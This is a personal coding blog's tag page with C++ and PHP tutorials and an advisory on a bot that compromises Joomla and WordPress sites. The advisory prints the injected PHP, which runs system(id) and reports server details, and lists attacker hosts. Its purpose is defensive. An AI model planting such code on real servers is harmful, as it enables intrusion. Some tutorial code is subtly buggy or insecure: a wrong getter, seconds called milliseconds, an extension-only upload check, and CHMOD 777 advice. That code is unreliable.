Words from Alejandro U. Alvarez
Posts tagged class
Overloading input/output operators C++
1689 days
As you might know, when we develop a simple program that runs in the system console, using the standard library iostream, we might want to have special ways of displaying a class object.
You have probably heard of the istream and ostream operators (<< and >>), we can use overloading to change their behaviour.
Since they are not functions from our class, we must use a special keyword, friend. A friend function is neither public or private, our class doesn't control it's scope. They are classes that don't belong to a class, but have access to its private members.
Let's create a simple class to demonstrate this:
This class has two private members, a and b. I haven't created any constructors as we don't really need them for the example. We will change the values of a and b using the input operator >> and we will display them using the output operator <<
How the istream and ostream operators work is quite simple actually. Declaring them friend gives them direct access to private members a and b. But since they don't belong to the class we must pass them a reference to the object from the class simple we want to modify: simple & s. The other parameter is the reference to the i/o stream itself, all our modifications will be "stored" in that reference and then returned.
Let me show you a basic main to show it in use:
In this sample main we instantiate simple in the object obj, and we then call the input operator >> to give a and b some values.
After that we display the values using the output operator <<.
This simple program generates the following output (Imagine I enter 2 and 3 as input):
2 3 Display my simple object: 2 3
If you want the full working code:
Well I hope you enjoyed this and understood it correctly 
If you have any problems or suggestions feel free to comment below,
Alex
Understanding inheritance in C++
0690 days
If you know nothing about classes in C++ you should probably go read a bit on that, although if you know Java or a similar OO language you can go ahead.
In C++, as with most modern OO languages we have encapsulation, inheritance, and polymorphism. I won't go into much detail as this is just a quick reference on inheritance hierarchy and priorities.
How inheritance works:
Skip this if you already know, I just want to make sure you can follow me here. Basically a class can inherit methods and attributes from a parent class. Why would we want to do this? Well, to avoid extra work, which is the main priority of every coder!
We will start with public inheritance. So let's start with our parent class car
#include <iostream> using namespace std; class car{ bool engine, roof; public: car(); car(int p) : passengers(p){}; car(int p,int p1); bool hasEngine()const{ return roof; } bool hasRoof()const{ return roof; } int maxP()const{ return passengers; } protected: int price; int passengers; }; car::car(){ engine=roof=true; passengers=5; } car::car(int p,int p1){ passengers=p; price = p1; }
As you can see I have added some attributes and methods as well as two constructors for testing purposes.
Each car has an engine (Or not), can have roof or be convertible (roof=false) and have different passenger count and price.
I've set the price and passengers as protected because when a class inherits from a parent class, it will be able to modify protected attributes. Although from the rest of the code they will act as private.
Now the good thing about inheritance is that we can add, modify and reuse the code from car. Let's say we want to have sports cars, which have some differences with normal cars. Let's imagine sports cars have a new attribute that is racing (true or false)
So now I will create a new class, that will inherit from car. After that we will be able to start testing,
class sportsCar : public car{
bool racing;
public:
sportsCar();
};
sportsCar::sportsCar(){
car::passengers=2;
}
Now to see what happens, let's do a simple main with a couple constructors:
(Note: This is the full code)
#include <iostream>
using namespace std;
class car{
bool engine, roof;
public:
car();
car(int p) : passengers(p){};
car(int p,int p1);
bool hasEngine()const{ return roof; }
bool hasRoof()const{ return roof; }
int maxP()const{ return passengers; }
protected:
int price;
int passengers;
};
car::car(){
engine=roof=true;
passengers=5;
}
car::car(int p,int p1){
passengers=p;
price = p1;
}
class sportsCar : public car{
bool racing;
public:
sportsCar();
};
sportsCar::sportsCar(){
car::passengers=2;
}
int main(){
car myCar(5,20000);
cout << "Normal car, passengers: " << myCar.maxP();
sportsCar ferrari;
cout << "\nSports car, passengers: " << ferrari.maxP();
cin.get();
return 0;
}
The output of this would be:
Normal car, passengers: 5 Sports car, passengers: 2
For more information on class inheritance, check out this guide by Robert I. Pitts
New threat for all Joomla and WordPress installations
3There is a new BOT out there, and one of the bad ones. I have started receiving traffic from it in my servers over the past week, and after some investigation it turns out it is quite a powerful bot, and so simple to use even a kid with a computer could use it.
The bot attacks mainly Joomla and WordPress installations, the Firestats plugin for WordPress version 1.6.2 has a known vulnerability that is exploited by this bot.
If successful, the bot will usually get your admin password and send it to a server somewhere, other versions f** your server up... it depends.
The bot is basically a top All-In-One product, that acts as a:
- RFI Scanner
- RFI Scan & Exploit
- Joomla RFI Scan & Exploit
- Milw0rm Search
- Google bypass
- Message Spy & Save
- Auto Spreading
The last known spreader for the bot is the Fx29Spreadz v1.0 (Apr. 2009) which can be used from a server with a PHP Shell.
IPs and servers:
This bot has used the following IPs and hosts (That I know of)
- 62.15.230.250
- 210.68.188.206
- 211.239.150.144
- 125.251.133.3
- 250.230.15.62.static.jazztel.es
- buminch.org
- www.framoss.ru
It has compromised servers in Republic of Korea, Taiwan and some other countries.
Injections:
The bot basically tries to insert the following PHP line:
< ?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
Although there is another variation which inserts:
< ?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf(”%d b”, $number); }
if($len >= 4 && $len < =6) {
return sprintf(”%0.2f Kb”, $number/1024); }
if($len >= 7 && $len < =9) {
return sprintf(”%0.2f Mb”, $number/1024/1024); }
return sprintf(”%0.2f Gb”, $number/1024/1024/1024); }
echo “Osirys<br>”;
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo “0sirys was here and also is a fucking gay..”;
echo “uname -a: $un”;
echo “os: $os”;
echo “id: $id1”;
echo “free: $free”;
echo “used: $used”;
echo “total: $all”;
exit;
Security recommendations:
If your website runs on WordPress, Joomla, Drupal, or other popular CMS you must upgrade all plugins and check for the latest version of the system!
If you have Firestats I recommend deactivating it for some time, until a new version fixing that bug is released, and still, I would wait.
If you have URL rewriting systems, ensure they are up-to-date, and if you built them re-check the security, and never include external files.
Hope this helped you 
If you found any variations and new stuff about this please comment below
Calculate age in PHP from timestamp
0879 days
If you ever wanted to calculate someone's age in PHP from a birth timestamp, you must take into account that the age is more than the number of years, since days and months are also important, so I wrote a simple function that will return the exact age for a given timestamp:
function getAge($birth){ $t = time(); $age = ($birth < 0) ? ( $t + ($birth * -1) ) : $t - $birth; return floor($age/31536000); }
Basically we first get the current time and store it in a variable (To avoid having to call the function time more than once)
Then we get the age in milliseconds (Taking into account that before 1969 timestamps are negative, thus the ternary operator)
Now we have the date in milliseconds, we divide it by the number of milliseconds in a year (60*60*24*365)
And that is basically it
Easiest PHP file upload
1911 days
Hello people,
I want to share with all of you a file upload class I have developed, that makes it stupid simple to upload files haha
The PHP class:
First of all, here is the PHP class you will need:
< ?php //Uploader class, by Alex // This class is meant to handle all kinds of file uploads for DJs Music // Images, music... all here class Uploader{ var $maxSize; var $allowedExt; var $fileInfo = array(); function config($maxSize,$allowedExt){ $this->maxSize = $maxSize; $this->allowedExt = $allowedExt; } function generateRandStr($length){ $randstr = ""; for($i=0; $i< $length; $i++){ $randnum = mt_rand(0,61); if($randnum < 10){ $randstr .= chr($randnum+48); }else if($randnum < 36){ $randstr .= chr($randnum+55); }else{ $randstr .= chr($randnum+61); } } return $randstr; } function check($uploadName){ if(isset($_FILES[$uploadName])){ $this->fileInfo['ext'] = substr(strrchr($_FILES[$uploadName]["name"], '.'), 1); $this->fileInfo['name'] = basename($_FILES[$uploadName]["name"]); $this->fileInfo['size'] = $_FILES[$uploadName]["size"]; $this->fileInfo['temp'] = $_FILES[$uploadName]["tmp_name"]; if($this->fileInfo['size']< $this->maxSize){ if(strlen($this->allowedExt)>0){ $exts = explode(',',$this->allowedExt); if(in_array($this->fileInfo['ext'],$exts)){ return true; } echo 'Invalid file extension. Allowed extensions are '.$this->allowedExt; return false; //failed ext } echo 'Sorry but there is an error in our server. Please try again later.'; return false; //All ext allowed }else{ if($this->maxSize < 1000000){ $rsi = round($this->maxSize/1000,2).' Kb'; }else if($this->maxSize < 1000000000){ $rsi = round($this->maxSize/1000000,2).' Mb'; }else{ $rsi = round($this->maxSize/1000000000,2).' Gb'; } echo 'File is too big. Maximum allowed size is '.$rsi; return false; //failed size } } echo 'Oops! An unexpected error occurred, please try again later.'; return false; //Either form not submitted or file/s not found } function upload($name,$dir,$fname=false){ if(!is_dir($dir)){ echo 'Sorry but there is an error in our server. Please try again later.'; return false; //Directory doesn't exist! } if($this->check($name)){ //Process upload. All info stored in array fileinfo: //Dir OK, keep going: //Get a new filename: if(!$fname){ $this->fileInfo['fname'] = $this->generateRandStr(15).'.'.$this->fileInfo['ext']; }else{ $this->fileInfo['fname'] = $fname; } while(file_exists($dir.$this->fileInfo['fname'])){ $this->fileInfo['fname'] = $this->generateRandStr(15).'.'.$this->fileInfo['ext']; } //Unique name gotten // Move file: if(@move_uploaded_file($this->fileInfo['temp'], $dir.$this->fileInfo['fname'])){ //Done return true; }else{ echo 'The file could not be uploaded, although everything went ok... Please try again later.'; return false; //File not moved } }else{ return false; } } }; //Initialize the object: $up = new Uploader; ?>
Alright this is the code. You shouldn't have to modify it, simply include it where you process the upload and the class will initiate itself inside the variable $up
Usage:
For this example I will suppose you have a basic HTML form as follows:
<form action="process.php" method="post" enctype="multipart/form-data"> <input name="uploadPic" type="file" /> <input name="upload" type="submit" value="Upload" /> </form>
As you can see, the action is process.php, which is, in this example, where the picture upload will be processed.
In the file process.php we will first include the upload handler, then configure it, and finally try to upload the file into the directory pictures/. Please take into account that it must be writable (CHMOD 777)
process.php:
< ?php //include the class: include('handleUpload.php'); $up->config('2000000','jpg,gif,png'); if($up->upload('uploadPic','pictures/')){ echo 'File uploaded. File information: '; echo $up->fileInfo['ext'].''; echo $up->fileInfo['name'].''; echo $up->fileInfo['size']; } // If the file was not uploaded, the error will have been echoed automatically ?>
As you can see there is no }else{ because the handler echoes the errors by itself. You can change this behavior easily by setting up your own function as desired.
In this example we have configured it to allow a maximum of 2000000 bytes per upload, and only jpg, gif, and png pictures.
Now that the file is uploaded you have some information about it in the $up object. The format ($up->fileInfo['ext']), the name ($up->fileInfo['name']), and finally the size in bytes ($up->fileInfo['size']).
The handler also generates a random name, and ensures it is not already in the directory. The new name is stored in the fileInfo array as mentioned above.
I hope you found this useful